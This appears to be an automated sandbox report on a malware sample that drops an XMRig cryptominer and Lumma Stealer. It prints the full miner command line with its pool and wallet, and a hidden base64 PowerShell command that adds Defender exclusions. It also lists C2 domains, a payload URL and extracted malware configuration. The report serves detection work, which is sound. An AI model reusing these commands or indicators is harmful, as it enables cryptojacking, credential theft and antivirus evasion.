12.2.RegSvcs.exe.245dd3ecee0.1.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4b0580:$s1: %s/%s (Windows NT %lu.%lu 0x4b16b0:$s3: \\.\WinRing0_ 0x4a7e78:$s4: pool_wallet 0x4a3428:$s5: cryptonight 0x4a3438:$s5: cryptonight 0x4a3448:$s5: cryptonight 0x4a3458:$s5: cryptonight 0x4a3470:$s5: cryptonight 0x4a3480:$s5: cryptonight 0x4a3490:$s5: cryptonight 0x4a34a8:$s5: cryptonight 0x4a34b8:$s5: cryptonight 0x4a34d0:$s5: cryptonight 0x4a34e8:$s5: cryptonight 0x4a34f8:$s5: cryptonight 0x4a3508:$s5: cryptonight 0x4a3518:$s5: cryptonight 0x4a3530:$s5: cryptonight 0x4a3548:$s5: cryptonight 0x4a3558:$s5: cryptonight 0x4a3568:$s5: cryptonight
12.2.RegSvcs.exe.245dd3ecee0.1.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4afba0:$x1: donate.ssl.xmrig.com 0x4b0071:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
12.2.RegSvcs.exe.245dd3ecee0.1.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4a90d8:$a1: mining.set_target 0x4a3bb0:$a2: XMRIG_HOSTNAME 0x4a5c80:$a3: Usage: xmrig [OPTIONS] 0x4a3b88:$a4: XMRIG_VERSION
13.2.AddInProcess.exe.140000000.0.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
12.2.RegSvcs.exe.245dd3ecee0.1.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
13.2.AddInProcess.exe.140000000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
13.2.AddInProcess.exe.140000000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4b1980:$s1: %s/%s (Windows NT %lu.%lu 0x4b2ab0:$s3: \\.\WinRing0_ 0x4a9278:$s4: pool_wallet 0x4a4828:$s5: cryptonight 0x4a4838:$s5: cryptonight 0x4a4848:$s5: cryptonight 0x4a4858:$s5: cryptonight 0x4a4870:$s5: cryptonight 0x4a4880:$s5: cryptonight 0x4a4890:$s5: cryptonight 0x4a48a8:$s5: cryptonight 0x4a48b8:$s5: cryptonight 0x4a48d0:$s5: cryptonight 0x4a48e8:$s5: cryptonight 0x4a48f8:$s5: cryptonight 0x4a4908:$s5: cryptonight 0x4a4918:$s5: cryptonight 0x4a4930:$s5: cryptonight 0x4a4948:$s5: cryptonight 0x4a4958:$s5: cryptonight 0x4a4968:$s5: cryptonight
13.2.AddInProcess.exe.140000000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4b0fa0:$x1: donate.ssl.xmrig.com 0x4b1471:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
13.2.AddInProcess.exe.140000000.0.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4aa4d8:$a1: mining.set_target 0x4a4fb0:$a2: XMRIG_HOSTNAME 0x4a7080:$a3: Usage: xmrig [OPTIONS] 0x4a4f88:$a4: XMRIG_VERSION
Click to see the 41 entries

Sigma Signatures

Bitcoin Miner

Sigma detected: Xmrig

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe, ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe, ParentProcessId: 8344, ParentProcessName: RegSvcs.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50, ProcessId: 8596, ProcessName: AddInProcess.exe

System Summary

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Source: Process started

Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe, ParentImage: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe, ParentProcessId: 6912, ParentProcessName: Current.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe, ProcessId: 8344, ProcessName: RegSvcs.exe

Sigma detected: Potential Crypto Mining Activity

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe, ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe, ParentProcessId: 8344, ParentProcessName: RegSvcs.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50, ProcessId: 8596, ProcessName: AddInProcess.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1296, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAF

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1296, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAF

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1296, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEQAeQBsAGEAbgBlAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAF

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 832, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 9104, ProcessName: svchost.exe

Suricata Signatures

ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-19T02:41:47.919517+0200	2036289	2	Crypto Currency Mining Activity Detected	192.168.11.30	53670	1.1.1.1	53	UDP

ET MALWARE Generic AsyncRAT Style SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-19T02:41:40.175830+0200	2035595	1	Domain Observed Used for C2 Detected	45.11.229.96	56001	192.168.11.30	49839	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-19T02:42:04.203939+0200	2054653	1	A Network Trojan was detected	192.168.11.30	49856	172.67.142.26	443	TCP
2024-09-19T02:42:05.070447+0200	2054653	1	A Network Trojan was detected	192.168.11.30	49857	172.67.142.26	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-19T02:42:04.203939+0200	2049836	1	A Network Trojan was detected	192.168.11.30	49856	172.67.142.26	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-19T02:42:05.070447+0200	2049812	1	A Network Trojan was detected	192.168.11.30	49857	172.67.142.26	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (eemmbryequo .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-19T02:42:03.969089+0200	2055880	1	Domain Observed Used for C2 Detected	192.168.11.30	49856	172.67.142.26	443	TCP
2024-09-19T02:42:04.544456+0200	2055880	1	Domain Observed Used for C2 Detected	192.168.11.30	49857	172.67.142.26	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eemmbryequo .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-19T02:42:03.643333+0200	2055879	1	Domain Observed Used for C2 Detected	192.168.11.30	63166	1.1.1.1	53	UDP

ETPRO COINMINER XMR CoinMiner Usage

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-19T02:42:53.042256+0200	2826930	2	Crypto Currency Mining Activity Detected	192.168.11.30	49845	142.202.242.43	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: tryyudjasudqo.shop	Avira URL Cloud: Label: malware
Source: reggwardssdqw.shop	Avira URL Cloud: Label: malware
Source: licenseodqwmqn.shop	Avira URL Cloud: Label: malware
Source: relaxatinownio.shop	Avira URL Cloud: Label: malware
Source: keennylrwmqlw.shop	Avira URL Cloud: Label: malware
Source: tesecuuweqo.shop	Avira URL Cloud: Label: malware
Source: tendencctywop.shop	Avira URL Cloud: Label: malware
Source: https://eemmbryequo.shop/api	Avira URL Cloud: Label: malware
Source: eemmbryequo.shop	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\QgL1KOz6bqKO.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Avira: detection malicious, Label: TR/Dropper.MSIL.Gen8
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Avira: detection malicious, Label: HEUR/AGEN.1358722
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Avira: detection malicious, Label: HEUR/AGEN.1358722

Found malware configuration

Source: 21.2.RegAsm.exe.400000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["reggwardssdqw.shop", "tesecuuweqo.shop", "relaxatinownio.shop", "eemmbryequo.shop", "keennylrwmqlw.shop", "tendencctywop.shop", "licenseodqwmqn.shop", "tryyudjasudqo.shop"], "Build id": "hv0fRu--"}

Multi AV Scanner detection for domain / URL

Source: 2x.si	Virustotal: Detection: 15%	Perma Link
Source: pool.hashvault.pro	Virustotal: Detection: 7%	Perma Link
Source: http://pesterbdd.com/images/Pester.png	Virustotal: Detection: 8%	Perma Link
Source: https://files.catbox.moe/kwfxr7.dll	Virustotal: Detection: 8%	Perma Link
Source: tesecuuweqo.shop	Virustotal: Detection: 9%	Perma Link
Source: https://eemmbryequo.shop/api	Virustotal: Detection: 16%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Roaming\l6E.exe	ReversingLabs: Detection: 28%

Multi AV Scanner detection for submitted file

Source: PT54FFSL7ET46RASB.exe	ReversingLabs: Detection: 34%
Source: PT54FFSL7ET46RASB.exe	Virustotal: Detection: 38%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Joe Sandbox ML: detected
